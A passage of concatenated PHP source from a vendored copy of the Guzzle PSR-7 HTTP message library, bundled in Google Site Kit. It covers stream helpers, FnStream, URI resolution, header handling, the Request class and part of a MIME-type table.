to open * @param string $mode Mode used to open the file * * @return resource * * @throws \RuntimeException if the file cannot be opened */ public static function tryFopen(string $filename, string $mode) { $ex = null; \set_error_handler(static function (int $errno, string $errstr) use($filename, $mode, &$ex) : bool { $ex = new \RuntimeException(\sprintf('Unable to open "%s" using mode "%s": %s', $filename, $mode, $errstr)); return \true; }); try { /** @var resource $handle */ $handle = \fopen($filename, $mode); } catch (\Throwable $e) { $ex = new \RuntimeException(\sprintf('Unable to open "%s" using mode "%s": %s', $filename, $mode, $e->getMessage()), 0, $e); } \restore_error_handler(); if ($ex) { /** @var $ex \RuntimeException */ throw $ex; } return $handle; } /** * Safely gets the contents of a given stream. * * When stream_get_contents fails, PHP normally raises a warning. This * function adds an error handler that checks for errors and throws an * exception instead. * * @param resource $stream * * @throws \RuntimeException if the stream cannot be read */ public static function tryGetContents($stream) : string { $ex = null; \set_error_handler(static function (int $errno, string $errstr) use(&$ex) : bool { $ex = new \RuntimeException(\sprintf('Unable to read stream contents: %s', $errstr)); return \true; }); try { /** @var string|false $contents */ $contents = \stream_get_contents($stream); if ($contents === \false) { $ex = new \RuntimeException('Unable to read stream contents'); } } catch (\Throwable $e) { $ex = new \RuntimeException(\sprintf('Unable to read stream contents: %s', $e->getMessage()), 0, $e); } \restore_error_handler(); if ($ex) { /** @var $ex \RuntimeException */ throw $ex; } return $contents; } /** * Returns a UriInterface for the given value. * * This function accepts a string or UriInterface and returns a * UriInterface for the given value. If the value is already a * UriInterface, it is returned as-is. * * @param string|UriInterface $uri * * @throws \InvalidArgumentException */ public static function uriFor($uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if ($uri instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface) { return $uri; } if (\is_string($uri)) { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri($uri); } throw new \InvalidArgumentException('URI must be a string or UriInterface'); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Compose stream implementations based on a hash of functions. * * Allows for easy testing and extension of a provided stream without needing * to create a concrete class for a simple extension point. */ #[\AllowDynamicProperties] final class FnStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { private const SLOTS = ['__toString', 'close', 'detach', 'rewind', 'getSize', 'tell', 'eof', 'isSeekable', 'seek', 'isWritable', 'write', 'isReadable', 'read', 'getContents', 'getMetadata']; /** @var array<string, callable> */ private $methods; /** * @param array<string, callable> $methods Hash of method name to a callable. */ public function __construct(array $methods) { $this->methods = $methods; // Create the functions on the class foreach ($methods as $name => $fn) { $this->{'_fn_' . $name} = $fn; } } /** * Lazily determine which methods are not implemented. * * @throws \BadMethodCallException */ public function __get(string $name) : void { throw new \BadMethodCallException(\str_replace('_fn_', '', $name) . '() is not implemented in the FnStream'); } /** * The close method is called on the underlying stream only if possible. */ public function __destruct() { if (isset($this->_fn_close)) { ($this->_fn_close)(); } } /** * An unserialize would allow the __destruct to run when the unserialized value goes out of scope. * * @throws \LogicException */ public function __wakeup() : void { throw new \LogicException('FnStream should never be unserialized'); } /** * Adds custom functionality to an underlying stream by intercepting * specific method calls. * * @param StreamInterface $stream Stream to decorate * @param array<string, callable> $methods Hash of method name to a closure * * @return FnStream */ public static function decorate(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, array $methods) { // If any of the required methods were not provided, then simply // proxy to the decorated stream. foreach (\array_diff(self::SLOTS, \array_keys($methods)) as $diff) { /** @var callable $callable */ $callable = [$stream, $diff]; $methods[$diff] = $callable; } return new self($methods); } public function __toString() : string { try { /** @var string */ return ($this->_fn___toString)(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } \trigger_error(\sprintf('%s::__toString exception: %s', self::class, (string) $e), \E_USER_ERROR); return ''; } } public function close() : void { ($this->_fn_close)(); } public function detach() { return ($this->_fn_detach)(); } public function getSize() : ?int { return ($this->_fn_getSize)(); } public function tell() : int { return ($this->_fn_tell)(); } public function eof() : bool { return ($this->_fn_eof)(); } public function isSeekable() : bool { return ($this->_fn_isSeekable)(); } public function rewind() : void { ($this->_fn_rewind)(); } public function seek($offset, $whence = \SEEK_SET) : void { ($this->_fn_seek)($offset, $whence); } public function isWritable() : bool { return ($this->_fn_isWritable)(); } public function write($string) : int { return ($this->_fn_write)($string); } public function isReadable() : bool { return ($this->_fn_isReadable)(); } public function read($length) : string { return ($this->_fn_read)($length); } public function getContents() : string { return ($this->_fn_getContents)(); } /** * @return mixed */ public function getMetadata($key = null) { return ($this->_fn_getMetadata)($key); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Resolves a URI reference in the context of a base URI and the opposite way. * * @author Tobias Schultze * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-5 */ final class UriResolver { /** * Removes dot segments from a path and returns the new path. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-5.2.4 */ public static function removeDotSegments(string $path) : string { if ($path === '' || $path === '/') { return $path; } $results = []; $segments = \explode('/', $path); foreach ($segments as $segment) { if ($segment === '..') { \array_pop($results); } elseif ($segment !== '.') { $results[] = $segment; } } $newPath = \implode('/', $results); if ($path[0] === '/' && (!isset($newPath[0]) || $newPath[0] !== '/')) { // Re-add the leading slash if necessary for cases like "/.." $newPath = '/' . $newPath; } elseif ($newPath !== '' && ($segment === '.' || $segment === '..')) { // Add the trailing slash if necessary // If newPath is not empty, then $segment must be set and is the last segment from the foreach $newPath .= '/'; } return $newPath; } /** * Converts the relative URI into a new URI that is resolved against the base URI. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-5.2 */ public static function resolve(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $base, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $rel) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if ((string) $rel === '') { // we can simply return the same base URI instance for this same-document reference return $base; } if ($rel->getScheme() != '') { return $rel->withPath(self::removeDotSegments($rel->getPath())); } if ($rel->getAuthority() != '') { $targetAuthority = $rel->getAuthority(); $targetPath = self::removeDotSegments($rel->getPath()); $targetQuery = $rel->getQuery(); } else { $targetAuthority = $base->getAuthority(); if ($rel->getPath() === '') { $targetPath = $base->getPath(); $targetQuery = $rel->getQuery() != '' ? $rel->getQuery() : $base->getQuery(); } else { if ($rel->getPath()[0] === '/') { $targetPath = $rel->getPath(); } else { if ($targetAuthority != '' && $base->getPath() === '') { $targetPath = '/' . $rel->getPath(); } else { $lastSlashPos = \strrpos($base->getPath(), '/'); if ($lastSlashPos === \false) { $targetPath = $rel->getPath(); } else { $targetPath = \substr($base->getPath(), 0, $lastSlashPos + 1) . $rel->getPath(); } } } $targetPath = self::removeDotSegments($targetPath); $targetQuery = $rel->getQuery(); } } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::composeComponents($base->getScheme(), $targetAuthority, $targetPath, $targetQuery, $rel->getFragment())); } /** * Returns the target URI as a relative reference from the base URI. * * This method is the counterpart to resolve(): * * (string) $target === (string) UriResolver::resolve($base, UriResolver::relativize($base, $target)) * * One use-case is to use the current request URI as base URI and then generate relative links in your documents * to reduce the document size or offer self-contained downloadable document archives. * * $base = new Uri('http://example.com/a/b/'); * echo UriResolver::relativize($base, new Uri('http://example.com/a/b/c')); // prints 'c'. * echo UriResolver::relativize($base, new Uri('http://example.com/a/x/y')); // prints '../x/y'. * echo UriResolver::relativize($base, new Uri('http://example.com/a/b/?q')); // prints '?q'. * echo UriResolver::relativize($base, new Uri('http://example.org/a/b/')); // prints '//example.org/a/b/'. * * This method also accepts a target that is already relative and will try to relativize it further. Only a * relative-path reference will be returned as-is. * * echo UriResolver::relativize($base, new Uri('/a/b/c')); // prints 'c' as well */ public static function relativize(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $base, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $target) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if ($target->getScheme() !== '' && ($base->getScheme() !== $target->getScheme() || $target->getAuthority() === '' && $base->getAuthority() !== '')) { return $target; } if (\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::isRelativePathReference($target)) { // As the target is already highly relative we return it as-is. It would be possible to resolve // the target with `$target = self::resolve($base, $target);` and then try make it more relative // by removing a duplicate query. But let's not do that automatically. return $target; } if ($target->getAuthority() !== '' && $base->getAuthority() !== $target->getAuthority()) { return $target->withScheme(''); } // We must remove the path before removing the authority because if the path starts with two slashes, the URI // would turn invalid. And we also cannot set a relative path before removing the authority, as that is also // invalid. $emptyPathUri = $target->withScheme('')->withPath('')->withUserInfo('')->withPort(null)->withHost(''); if ($base->getPath() !== $target->getPath()) { return $emptyPathUri->withPath(self::getRelativePath($base, $target)); } if ($base->getQuery() === $target->getQuery()) { // Only the target fragment is left. And it must be returned even if base and target fragment are the same. return $emptyPathUri->withQuery(''); } // If the base URI has a query but the target has none, we cannot return an empty path reference as it would // inherit the base query component when resolving. if ($target->getQuery() === '') { $segments = \explode('/', $target->getPath()); /** @var string $lastSegment */ $lastSegment = \end($segments); return $emptyPathUri->withPath($lastSegment === '' ? './' : $lastSegment); } return $emptyPathUri; } private static function getRelativePath(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $base, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $target) : string { $sourceSegments = \explode('/', $base->getPath()); $targetSegments = \explode('/', $target->getPath()); \array_pop($sourceSegments); $targetLastSegment = \array_pop($targetSegments); foreach ($sourceSegments as $i => $segment) { if (isset($targetSegments[$i]) && $segment === $targetSegments[$i]) { unset($sourceSegments[$i], $targetSegments[$i]); } else { break; } } $targetSegments[] = $targetLastSegment; $relativePath = \str_repeat('../', \count($sourceSegments)) . \implode('/', $targetSegments); // A reference to am empty last segment or an empty first sub-segment must be prefixed with "./". // This also applies to a segment with a colon character (e.g., "file:colon") that cannot be used // as the first segment of a relative-path reference, as it would be mistaken for a scheme name. if ('' === $relativePath || \false !== \strpos(\explode('/', $relativePath, 2)[0], ':')) { $relativePath = "./{$relativePath}"; } elseif ('/' === $relativePath[0]) { if ($base->getAuthority() != '' && $base->getPath() === '') { // In this case an extra slash is added by resolve() automatically. So we must not add one here. $relativePath = ".{$relativePath}"; } else { $relativePath = "./{$relativePath}"; } } return $relativePath; } private function __construct() { // cannot be instantiated } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Stream decorator trait * * @property StreamInterface $stream */ trait StreamDecoratorTrait { /** * @param StreamInterface $stream Stream to decorate */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream) { $this->stream = $stream; } /** * Magic method used to create a new stream if streams are not added in * the constructor of a decorator (e.g., LazyOpenStream). * * @return StreamInterface */ public function __get(string $name) { if ($name === 'stream') { $this->stream = $this->createStream(); return $this->stream; } throw new \UnexpectedValueException("{$name} not found on class"); } public function __toString() : string { try { if ($this->isSeekable()) { $this->seek(0); } return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } \trigger_error(\sprintf('%s::__toString exception: %s', self::class, (string) $e), \E_USER_ERROR); return ''; } } public function getContents() : string { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToString($this); } /** * Allow decorators to implement custom methods * * @return mixed */ public function __call(string $method, array $args) { /** @var callable $callable */ $callable = [$this->stream, $method]; $result = $callable(...$args); // Always return the wrapped object if the result is a return $this return $result === $this->stream ? $this : $result; } public function close() : void { $this->stream->close(); } /** * @return mixed */ public function getMetadata($key = null) { return $this->stream->getMetadata($key); } public function detach() { return $this->stream->detach(); } public function getSize() : ?int { return $this->stream->getSize(); } public function eof() : bool { return $this->stream->eof(); } public function tell() : int { return $this->stream->tell(); } public function isReadable() : bool { return $this->stream->isReadable(); } public function isWritable() : bool { return $this->stream->isWritable(); } public function isSeekable() : bool { return $this->stream->isSeekable(); } public function rewind() : void { $this->seek(0); } public function seek($offset, $whence = \SEEK_SET) : void { $this->stream->seek($offset, $whence); } public function read($length) : string { return $this->stream->read($length); } public function write($string) : int { return $this->stream->write($string); } /** * Implement in subclasses to dynamically create streams when requested. * * @throws \BadMethodCallException */ protected function createStream() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { throw new \BadMethodCallException('Not implemented'); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Trait implementing functionality common to requests and responses. */ trait MessageTrait { /** @var string[][] Map of all registered headers, as original name => array of values */ private $headers = []; /** @var string[] Map of lowercase header name => original name at registration */ private $headerNames = []; /** @var string */ private $protocol = '1.1'; /** @var StreamInterface|null */ private $stream; public function getProtocolVersion() : string { return $this->protocol; } public function withProtocolVersion($version) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { if ($this->protocol === $version) { return $this; } $new = clone $this; $new->protocol = $version; return $new; } public function getHeaders() : array { return $this->headers; } public function hasHeader($header) : bool { return isset($this->headerNames[\strtolower($header)]); } public function getHeader($header) : array { $header = \strtolower($header); if (!isset($this->headerNames[$header])) { return []; } $header = $this->headerNames[$header]; return $this->headers[$header]; } public function getHeaderLine($header) : string { return \implode(', ', $this->getHeader($header)); } public function withHeader($header, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = \strtolower($header); $new = clone $this; if (isset($new->headerNames[$normalized])) { unset($new->headers[$new->headerNames[$normalized]]); } $new->headerNames[$normalized] = $header; $new->headers[$header] = $value; return $new; } public function withAddedHeader($header, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = \strtolower($header); $new = clone $this; if (isset($new->headerNames[$normalized])) { $header = $this->headerNames[$normalized]; $new->headers[$header] = \array_merge($this->headers[$header], $value); } else { $new->headerNames[$normalized] = $header; $new->headers[$header] = $value; } return $new; } public function withoutHeader($header) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { $normalized = \strtolower($header); if (!isset($this->headerNames[$normalized])) { return $this; } $header = $this->headerNames[$normalized]; $new = clone $this; unset($new->headers[$header], $new->headerNames[$normalized]); return $new; } public function getBody() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { if (!$this->stream) { $this->stream = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor(''); } return $this->stream; } public function withBody(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $body) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface { if ($body === $this->stream) { return $this; } $new = clone $this; $new->stream = $body; return $new; } /** * @param (string|string[])[] $headers */ private function setHeaders(array $headers) : void { $this->headerNames = $this->headers = []; foreach ($headers as $header => $value) { // Numeric array keys are converted to int by PHP. $header = (string) $header; $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = \strtolower($header); if (isset($this->headerNames[$normalized])) { $header = $this->headerNames[$normalized]; $this->headers[$header] = \array_merge($this->headers[$header], $value); } else { $this->headerNames[$normalized] = $header; $this->headers[$header] = $value; } } } /** * @param mixed $value * * @return string[] */ private function normalizeHeaderValue($value) : array { if (!\is_array($value)) { return $this->trimAndValidateHeaderValues([$value]); } if (\count($value) === 0) { throw new \InvalidArgumentException('Header value can not be an empty array.'); } return $this->trimAndValidateHeaderValues($value); } /** * Trims whitespace from the header values. * * Spaces and tabs ought to be excluded by parsers when extracting the field value from a header field. * * header-field = field-name ":" OWS field-value OWS * OWS = *( SP / HTAB ) * * @param mixed[] $values Header values * * @return string[] Trimmed header values * * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4 */ private function trimAndValidateHeaderValues(array $values) : array { return \array_map(function ($value) { if (!\is_scalar($value) && null !== $value) { throw new \InvalidArgumentException(\sprintf('Header value must be scalar or null but %s provided.', \is_object($value) ? \get_class($value) : \gettype($value))); } $trimmed = \trim((string) $value, " \t"); $this->assertValue($trimmed); return $trimmed; }, \array_values($values)); } /** * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2 * * @param mixed $header */ private function assertHeader($header) : void { if (!\is_string($header)) { throw new \InvalidArgumentException(\sprintf('Header name must be a string but %s provided.', \is_object($header) ? \get_class($header) : \gettype($header))); } if (!\preg_match('/^[a-zA-Z0-9\'`#$%&*+.^_|~!-]+$/D', $header)) { throw new \InvalidArgumentException(\sprintf('"%s" is not valid header name.', $header)); } } /** * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2 * * field-value = *( field-content / obs-fold ) * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] * field-vchar = VCHAR / obs-text * VCHAR = %x21-7E * obs-text = %x80-FF * obs-fold = CRLF 1*( SP / HTAB ) */ private function assertValue(string $value) : void { // The regular expression intentionally does not support the obs-fold production, because as // per RFC 7230#3.2.4: // // A sender MUST NOT generate a message that includes // line folding (i.e., that has any field-value that contains a match to // the obs-fold rule) unless the message is intended for packaging // within the message/http media type. // // Clients must not send a request with line folding and a server sending folded headers is // likely very rare. Line folding is a fairly obscure feature of HTTP/1.1 and thus not accepting // folding is not likely to break any legitimate use case. if (!\preg_match('/^[\\x20\\x09\\x21-\\x7E\\x80-\\xFF]*$/D', $value)) { throw new \InvalidArgumentException(\sprintf('"%s" is not valid header value.', $value)); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * PSR-7 request implementation. */ class Request implements \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { use MessageTrait; /** @var string */ private $method; /** @var string|null */ private $requestTarget; /** @var UriInterface */ private $uri; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param (string|string[])[] $headers Request headers * @param string|resource|StreamInterface|null $body Request body * @param string $version Protocol version */ public function __construct(string $method, $uri, array $headers = [], $body = null, string $version = '1.1') { $this->assertMethod($method); if (!$uri instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface) { $uri = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri($uri); } $this->method = \strtoupper($method); $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!isset($this->headerNames['host'])) { $this->updateHostFromUri(); } if ($body !== '' && $body !== null) { $this->stream = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($body); } } public function getRequestTarget() : string { if ($this->requestTarget !== null) { return $this->requestTarget; } $target = $this->uri->getPath(); if ($target === '') { $target = '/'; } if ($this->uri->getQuery() != '') { $target .= '?' . $this->uri->getQuery(); } return $target; } public function withRequestTarget($requestTarget) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { if (\preg_match('#\\s#', $requestTarget)) { throw new \InvalidArgumentException('Invalid request target provided; cannot contain whitespace'); } $new = clone $this; $new->requestTarget = $requestTarget; return $new; } public function getMethod() : string { return $this->method; } public function withMethod($method) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { $this->assertMethod($method); $new = clone $this; $new->method = \strtoupper($method); return $new; } public function getUri() : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { return $this->uri; } public function withUri(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, $preserveHost = \false) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { if ($uri === $this->uri) { return $this; } $new = clone $this; $new->uri = $uri; if (!$preserveHost || !isset($this->headerNames['host'])) { $new->updateHostFromUri(); } return $new; } private function updateHostFromUri() : void { $host = $this->uri->getHost(); if ($host == '') { return; } if (($port = $this->uri->getPort()) !== null) { $host .= ':' . $port; } if (isset($this->headerNames['host'])) { $header = $this->headerNames['host']; } else { $header = 'Host'; $this->headerNames['host'] = 'Host'; } // Ensure Host is the first header. // See: https://datatracker.ietf.org/doc/html/rfc7230#section-5.4 $this->headers = [$header => [$host]] + $this->headers; } /** * @param mixed $method */ private function assertMethod($method) : void { if (!\is_string($method) || $method === '') { throw new \InvalidArgumentException('Method must be a non-empty string.'); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Exception; use InvalidArgumentException; /** * Exception thrown if a URI cannot be parsed because it's malformed. */ class MalformedUriException extends \InvalidArgumentException { } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; final class MimeType { private const MIME_TYPES = ['1km' => 'application/vnd.1000minds.decision-model+xml', '3dml' => 'text/vnd.in3d.3dml', '3ds' => 'image/x-3ds', '3g2' => 'video/3gpp2', '3gp' => 'video/3gp', '3gpp' => 'video/3gpp', '3mf' => 'model/3mf', '7z' => 'application/x-7z-compressed', '7zip' => 'application/x-7z-compressed', '123' => 'application/vnd.lotus-1-2-3', 'aab' => 'application/x-authorware-bin', 'aac' => 'audio/aac', 'aam' => 'application/x-authorware-map', 'aas' => 'application/x-authorware-seg', 'abw' => 'application/x-abiword', 'ac' => 'application/vnd.nokia.n-gage.ac+xml', 'ac3' => 'audio/ac3', 'acc' => 'application/vnd.americandynamics.acc', 'ace' => 'application/x-ace-compressed', 'acu' => 'application/vnd.acucobol', 'acutc' => 'application/vnd.acucorp', 'adp' => 'audio/adpcm', 'adts' => 'audio/aac', 'aep' => 'application/vnd.audiograph', 'afm' => 'application/x-font-type1', 'afp' => 'application/vnd.ibm.modcap', 'age' => 'application/vnd.age', 'ahead' => 'application/vnd.ahead.space', 'ai' => 'application/pdf', 'aif' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'air' => 'application/vnd.adobe.air-application-installer-package+zip', 'ait' => 'application/vnd.dvb.ait', 'ami' => 'application/vnd.amiga.ami', 'aml' => 'application/automationml-aml+xml', 'amlx' => 'application/automationml-amlx+zip', 'amr' => 'audio/amr', 'apk' => 'application/vnd.android.package-archive', 'apng' => 'image/apng', 'appcache' => 'text/cache-manifest', 'appinstaller' => 'application/appinstaller', 'application' => 'application/x-ms-application', 'appx' => 'application/appx', 'appxbundle' => 'application/appxbundle', 'apr' => 'application/vnd.lotus-approach', 'arc' => 'application/x-freearc', 'arj' => 'application/x-arj', 'asc' => 'application/pgp-signature', 'asf' => 'video/x-ms-asf', 'asm' => 'text/x-asm', 'aso' => 'application/vnd.accpac.simply.aso', 'asx' => 'video/x-ms-asf', 'atc' => 'application/vnd.acucorp', 'atom' => 'application/atom+xml', 'atomcat' => 'application/atomcat+xml', 'atomdeleted' => 'application/atomdeleted+xml', 'atomsvc' => 'application/atomsvc+xml', 'atx' => 'application/vnd.antix.game-component', 'au' => 'audio/x-au', 'avci' => 'image/avci', 'avcs' => 'image/avcs', 'avi' => 'video/x-msvideo', 'avif' => 'image/avif', 'aw' => 'application/applixware', 'azf' => 'application/vnd.airzip.filesecure.azf', 'azs' => 'application/vnd.airzip.filesecure.azs', 'azv' => 'image/vnd.airzip.accelerator.azv', 'azw' => 'application/vnd.amazon.ebook', 'b16' => 'image/vnd.pco.b16', 'bat' => 'application/x-msdownload', 'bcpio' => 'application/x-bcpio', 'bdf' => 'application/x-font-bdf', 'bdm' => 'application/vnd.syncml.dm+wbxml', 'bdoc' => 'application/x-bdoc', 'bed' => 'application/vnd.realvnc.bed', 'bh2' => 'application/vnd.fujitsu.oasysprs', 'bin' => 'application/octet-stream', 'blb' => 'application/x-blorb', 'blorb' => 'application/x-blorb', 'bmi' => 'application/vnd.bmi', 'bmml' => 'application/vnd.balsamiq.bmml+xml', 'bmp' => 'image/bmp', 'book' => 'application/vnd.framemaker', 'box' => 'application/vnd.previewsystems.box', 'boz' => 'application/x-bzip2', 'bpk' => 'application/octet-stream', 'bpmn' => 'application/octet-stream', 'bsp' => 'model/vnd.valve.source.compiled-map', 'btf' => 'image/prs.btif', 'btif' => 'image/prs.btif', 'buffer' => 'application/octet-stream', 'bz' => 'application/x-bzip', 'bz2' => 'application/x-bzip2', 'c' => 'text/x-c', 'c4d' => 'application/vnd.clonk.c4group', 'c4f' => 'application/vnd.clonk.c4group', 'c4g' => 'application/vnd.clonk.c4group', 'c4p' => 'application/vnd.clonk.c4group', 'c4u' => 'application/vnd.clonk.c4group', 'c11amc' => 'application/vnd.cluetrust.cartomobile-config', 'c11amz' => 'application/vnd.cluetrust.cartomobile-config-pkg', 'cab' => 'application/vnd.ms-cab-compressed', 'caf' => 'audio/x-caf', 'cap' => 'application/vnd.tcpdump.pcap', 'car' => 'application/vnd.curl.car', 'cat' => 'application/vnd.ms-pki.seccat', 'cb7' => 'application/x-cbr', 'cba' => 'application/x-cbr', 'cbr' => 'application/x-cbr', 'cbt' => 'application/x-cbr', 'cbz' => 'application/x-cbr', 'cc' => 'text/x-c', 'cco' => 'application/x-cocoa', 'cct' => 'application/x-director', 'ccxml' => 'application/ccxml+xml', 'cdbcmsg' => 'application/vnd.contact.cmsg', 'cdf' => 'application/x-netcdf', 'cdfx' => 'application/cdfx+xml', 'cdkey' => 'application/vnd.mediastation.cdkey', 'cdmia' => 'application/cdmi-capability', 'cdmic' => 'application/cdmi-container', 'cdmid' => 'application/cdmi-domain', 'cdmio' => 'application/cdmi-object', 'cdmiq' => 'application/cdmi-queue', 'cdr' => 'application/cdr', 'cdx' => 'chemical/x-cdx', 'cdxml' => 'application/vnd.chemdraw+xml', 'cdy' => 'application/vnd.cinderella', 'cer' => 'application/pkix-cert', 'cfs' => 'application/x-cfs-compressed', 'cgm' => 'image/cgm', 'chat' => 'application/x-chat', 'chm' => 'application/vnd.ms-htmlhelp', 'chrt' => 'application/vnd.kde.kchart', 'cif' => 'chemical/x-cif', 'cii' => 'application/vnd.anser-web-certificate-issue-initiation', 'cil' => 'application/vnd.ms-artgalry', 'cjs' => 'application/node', 'cla' => 'application/vnd.claymore', 'class' => 'application/octet-stream', 'cld' => 'model/vnd.cld', 'clkk' => 'application/vnd.crick.clicker.keyboard', 'clkp' => 'application/vnd.crick.clicker.palette', 'clkt' => 'application/vnd.crick.clicker.template', 'clkw' => 'application/vnd.crick.clicker.wordbank', 'clkx' => 'application/vnd.crick.clicker', 'clp' => 'application/x-msclip', 'cmc' => 'application/vnd.cosmocaller', 'cmdf' => 'chemical/x-cmdf', 'cml' => 'chemical/x-cml', 'cmp' => 'application/vnd.yellowriver-custom-menu', 'cmx' => 'image/x-cmx', 'cod' => 'application/vnd.rim.cod', 'coffee' => 'text/coffeescript', 'com' => 'application/x-msdownload', 'conf' => 'text/plain', 'cpio' => 'application/x-cpio', 'cpl' => 'application/cpl+xml', 'cpp' => 'text/x-c', 'cpt' => 'application/mac-compactpro', 'crd' => 'application/x-mscardfile', 'crl' => 'application/pkix-crl', 'crt' => 'application/x-x509-ca-cert', 'crx' => 'application/x-chrome-extension', 'cryptonote' => 'application/vnd.rig.cryptonote', 'csh' => 'application/x-csh', 'csl' => 'application/vnd.citationstyles.style+xml', 'csml' => 'chemical/x-csml', 'csp' => 'application/vnd.commonspace', 'csr' => 'application/octet-stream', 'css' => 'text/css', 'cst' => 'application/x-director', 'csv' => 'text/csv', 'cu' => 'application/cu-seeme', 'curl' => 'text/vnd.curl', 'cwl' => 'application/cwl', 'cww' => 'application/prs.cww', 'cxt' => 'application/x-director', 'cxx' => 'text/x-c', 'dae' => 'model/vnd.collada+xml', 'daf' => 'application/vnd.mobius.daf', 'dart' => 'application/vnd.dart', 'dataless' => 'application/vnd.fdsn.seed', 'davmount' => 'application/davmount+xml', 'dbf' => 'application/vnd.dbf', 'dbk' => 'application/docbook+xml', 'dcr' => 'application/x-director', 'dcurl' => 'text/vnd.curl.dcurl', 'dd2' => 'application/vnd.oma.dd2+xml', 'ddd' => 'application/vnd.fujixerox.ddd', 'ddf' => 'application/vnd.syncml.dmddf+xml', 'dds' => 'image/vnd.ms-dds', 'deb' => 'application/x-debian-package', 'def' => 'text/plain', 'deploy' => 'application/octet-stream', 'der' => 'application/x-x509-ca-cert', 'dfac' => 'application/vnd.dreamfactory', 'dgc' => 'application/x-dgc-compressed', 'dib' => 'image/bmp', 'dic' => 'text/x-c', 'dir' => 'application/x-director', 'dis' => 'application/vnd.mobius.dis', 'disposition-notification' => 'message/disposition-notification', 'dist' => 'application/octet-stream', 'distz' => 'application/octet-stream', 'djv' => 'image/vnd.djvu', 'djvu' => 'image/vnd.djvu', 'dll' => 'application/octet-stream', 'dmg' => 'application/x-apple-diskimage', 'dmn' => 'application/octet-stream', 'dmp' => 'application/vnd.tcpdump.pcap', 'dms' => 'application/octet-stream', 'dna' => 'application/vnd.dna', 'doc' => 'application/msword', 'docm' => 'application/vnd.ms-word.template.macroEnabled.12', 'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'dot' => 'application/msword', 'dotm' => 'application/vnd.ms-word.template.macroEnabled.12', 'dotx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.template', 'dp' => 'application/vnd.osgi.dp', 'dpg' => 'application/vnd.dpgraph', 'dpx' => 'image/dpx', 'dra' => 'audio/vnd.dra', 'drle' => 'image/dicom-rle', 'dsc' => 